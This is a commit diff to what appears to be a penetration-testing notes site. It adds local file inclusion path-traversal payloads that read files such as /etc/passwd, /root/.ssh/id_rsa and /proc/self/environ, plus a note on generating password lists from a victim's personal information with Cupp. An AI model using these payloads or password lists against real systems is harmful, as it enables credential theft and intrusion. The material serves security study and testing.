updated LFI

hideckies · Nov 8, 2024 · 8b54414 · 8b54414
1 parent 32fa1a4
commit 8b54414
Show file tree

Hide file tree

Showing 5 changed files with 34 additions and 131 deletions.
diff --git a/src/exploit/linux/privilege-escalation/index.md b/src/exploit/linux/privilege-escalation/index.md
@@ -6,7 +6,7 @@ tags:
     - Remote Code Execution
 refs:
     - https://book.hacktricks.xyz/linux-hardening/privilege-escalation
-date: 2024-10-25
+date: 2024-11-08
 draft: false
 ---
 
@@ -1103,7 +1103,18 @@ The text like "--More--(60%)" will be appeared.
 
 <br />
 
-## Password Guessing from Old One
+## Password Guessing
+
+### Generate Passwords From Victim Information
+
+Using [Cupp](https://github.com/Mebus/cupp), we can generate a password list from victim's personal information.
+
+```bash
+# -i: Interactive mode
+python3 cupp -i
+```
+
+### Generate Passwords From Old One
 
 ```sh
 password2021 -> password2022, password2023

diff --git a/src/exploit/reconnaissance/person-investigation.md b/src/exploit/reconnaissance/person-investigation.md
diff --git a/src/exploit/reconnaissance/social-engineering.md b/src/exploit/reconnaissance/social-engineering.md
diff --git a/src/exploit/reverse-engineering/reversing/reversing-pe.md b/src/exploit/reverse-engineering/reversing/reversing-pe.md
@@ -5,7 +5,7 @@ tags:
     - Reverse Engineering
     - Windows
 refs:
-date: 2024-02-18
+date: 2024-11-08
 draft: false
 ---
 
@@ -38,10 +38,11 @@ When results appears, check the section name in the PE Section.
 
 <br />
 
-## Debugging
+## Debugging/Reverse Engineering
 
 - [Decompiler Explorer](https://dogbolt.org/)
 - dnSpy
+- DotPeek (for DLL)
 - ILSpy
 - [AnaloniaILSpy](https://github.com/icsharpcode/AvaloniaILSpy)
 - Cutter

diff --git a/src/exploit/web/security-risk/file-inclusion.md b/src/exploit/web/security-risk/file-inclusion.md
@@ -5,7 +5,7 @@ tags:
     - Web
 refs:
     - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
-date: 2024-10-25
+date: 2024-11-08
 draft: false
 ---
 
@@ -90,6 +90,17 @@ ffuf -u http://example.com/?page=FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gra
 ffuf -u http://example.com/?page=FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt
 ```
 
+### Abuse Server Misconfiguration
+
+We can try to test common paths instead of params by abusing server’s alias misconfiguration.
+
+```bash
+/images/../etc/passwd
+/images/../../etc/passwd
+/images../etc/passwd
+/images../../etc/passwd
+```
+
 ### Interesting Files
 
 When our payload is successful, we can additionaly investigate local files and retrieve sensitivin information.
@@ -111,6 +122,9 @@ When our payload is successful, we can additionaly investigate local files and r
 ?pgae=/root/.profile
 ?page=/root/.ssh/id_rsa
 
+# System-wide configurations
+?page=/etc/bash.bashrc
+
 # OS
 ?page=/etc/lsb-release
 ?page=/etc/os-release
@@ -119,6 +133,8 @@ When our payload is successful, we can additionaly investigate local files and r
 ?page=/proc/net/tcp
 ?page=/proc/self/cmdline
 ?page=/proc/self/environ
+?page=/proc/self/fd/0
+?page=/proc/self/fd/1
 ?page=/proc/<pid>/cmdline
 ?page=/proc/<pid>/environ
 
@@ -178,6 +194,7 @@ When our payload is successful, we can additionaly investigate local files and r
 ?page=/etc/nginx/conf.d/example.conf
 ?page=/etc/nginx/conf.d/subdomain.example.com.conf
 ?page=/etc/nginx/conf.d/subdomain.conf
+?page=/etc/nginx/sites-available/default
 ?page=/etc/nginx/sites-available/example.com.conf
 ?page=/etc/nginx/sites-enabled/default
 ?page=/etc/nginx/sites-enabled/example.com.conf